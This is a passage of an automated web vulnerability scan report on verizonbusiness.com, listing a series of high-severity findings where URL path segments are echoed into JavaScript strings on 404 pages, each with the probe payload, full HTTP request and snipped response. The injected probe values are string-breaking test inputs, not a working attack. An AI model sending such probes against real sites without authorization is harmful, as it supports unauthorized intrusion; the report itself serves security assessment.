<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
ER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Medium/products/itinfrastructure/computing/caas_smbce7a7";3fec95ae7a4/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.16. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/products/itinfrastructure/computing/caas_smb/

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41ab4'%3b481d5c5b252 was submitted in the REST URL parameter 5. This input was echoed as 41ab4';481d5c5b252 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/products/itinfrastructure/computing/caas_smb41ab4'%3b481d5c5b252/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:25 GMT
Content-Type: text/html
Content-Length: 21766
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Medium/products/itinfrastructure/computing/caas_smb41ab4';481d5c5b252/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.17. http://www.verizonbusiness.com/Medium/solutions/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/solutions/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52ee7"%3b4fe464cfdc8 was submitted in the REST URL parameter 1. This input was echoed as 52ee7";4fe464cfdc8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium52ee7"%3b4fe464cfdc8/solutions/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21470
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Medium52ee7";4fe464cfdc8/solutions/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR S
...[SNIP]...

1.18. http://www.verizonbusiness.com/Medium/solutions/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/solutions/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80946'%3b2f4c28f49f3 was submitted in the REST URL parameter 1. This input was echoed as 80946';2f4c28f49f3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium80946'%3b2f4c28f49f3/solutions/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:14 GMT
Content-Type: text/html
Content-Length: 42617
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Medium80946';2f4c28f49f3/solutions/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.19. http://www.verizonbusiness.com/Medium/solutions/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/solutions/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f377a'%3b4e6a1ff2712 was submitted in the REST URL parameter 2. This input was echoed as f377a';4e6a1ff2712 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/solutionsf377a'%3b4e6a1ff2712/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:41 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21698
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Medium/solutionsf377a';4e6a1ff2712/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.20. http://www.verizonbusiness.com/Medium/solutions/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/solutions/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e014"%3b3f87cc0569c was submitted in the REST URL parameter 2. This input was echoed as 3e014";3f87cc0569c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/solutions3e014"%3b3f87cc0569c/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:30 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21696
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Medium/solutions3e014";3f87cc0569c/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.21. http://www.verizonbusiness.com/Medium/support/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/support/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7cac"%3b6347c6331eb was submitted in the REST URL parameter 1. This input was echoed as d7cac";6347c6331eb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Mediumd7cac"%3b6347c6331eb/support/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:08 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21464
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Mediumd7cac";6347c6331eb/support/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.22. http://www.verizonbusiness.com/Medium/support/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/support/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb22e'%3b1aef5997d13 was submitted in the REST URL parameter 1. This input was echoed as eb22e';1aef5997d13 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Mediumeb22e'%3b1aef5997d13/support/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 21464
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Mediumeb22e';1aef5997d13/support/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.23. http://www.verizonbusiness.com/Medium/support/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/support/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b093"%3b87092571ce5 was submitted in the REST URL parameter 2. This input was echoed as 7b093";87092571ce5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/support7b093"%3b87092571ce5/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:27 GMT
Content-Type: text/html
Content-Length: 21692
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Medium/support7b093";87092571ce5/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.24. http://www.verizonbusiness.com/Medium/support/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/support/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9dff3'%3b89432a0569b was submitted in the REST URL parameter 2. This input was echoed as 9dff3';89432a0569b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/support9dff3'%3b89432a0569b/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:37 GMT
Content-Type: text/html
Content-Length: 21692
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Medium/support9dff3';89432a0569b/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.25. http://www.verizonbusiness.com/Products/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 858bb'%3ba75ff52257e was submitted in the REST URL parameter 1. This input was echoed as 858bb';a75ff52257e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products858bb'%3ba75ff52257e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:48 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40616
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products858bb';a75ff52257e/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.26. http://www.verizonbusiness.com/Products/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f82ff"%3b82f06c69141 was submitted in the REST URL parameter 1. This input was echoed as f82ff";82f06c69141 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsf82ff"%3b82f06c69141/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:38 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40616
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsf82ff";82f06c69141/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.27. http://www.verizonbusiness.com/Products/communications/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec852"%3b6fb5f3885aa was submitted in the REST URL parameter 1. This input was echoed as ec852";6fb5f3885aa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsec852"%3b6fb5f3885aa/communications/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:05 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsec852";6fb5f3885aa/communications/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.28. http://www.verizonbusiness.com/Products/communications/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77697'%3b7b5dd88adbe was submitted in the REST URL parameter 1. This input was echoed as 77697';7b5dd88adbe in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products77697'%3b7b5dd88adbe/communications/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:23 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
